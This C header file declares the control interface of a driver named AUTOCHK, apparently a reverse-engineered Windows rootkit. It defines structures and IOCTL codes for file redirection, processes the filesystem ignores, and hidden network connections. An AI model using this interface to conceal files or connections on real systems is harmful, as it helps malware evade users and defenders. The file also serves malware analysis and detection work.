#pragma once

typedef struct _AUTOCHK_REDIRECTED_FILE {
	WCHAR SourceFilePath[260];
	WCHAR TargetFilePath[260];
} AUTOCHK_REDIRECTED_FILE, *PAUTOCHK_REDIRECTED_FILE;

typedef struct _AUTOCHK_HIDDEN_CONNECTION {
	ULONG IpAddress;
	USHORT Port;		// Unused.
	USHORT _Unknown;
} AUTOCHK_HIDDEN_CONNECTION, *PAUTOCHK_HIDDEN_CONNECTION;

#define IOCTL_AUTOCHK_ADD_FILE_REDIRECTION CTL_CODE(FILE_DEVICE_UNKNOWN, 0xf41, METHOD_BUFFERED, FILE_READ_ACCESS | FILE_WRITE_ACCESS)
#define IOCTL_AUTOCHK_ADD_FS_IGNORED_PROCESS CTL_CODE(FILE_DEVICE_UNKNOWN, 0xf42, METHOD_BUFFERED, FILE_READ_ACCESS | FILE_WRITE_ACCESS)
#define IOCTL_AUTOCHK_ADD_HIDDEN_CONNECTION CTL_CODE(FILE_DEVICE_UNKNOWN, 0xff8, METHOD_BUFFERED, FILE_READ_ACCESS| FILE_WRITE_ACCESS)
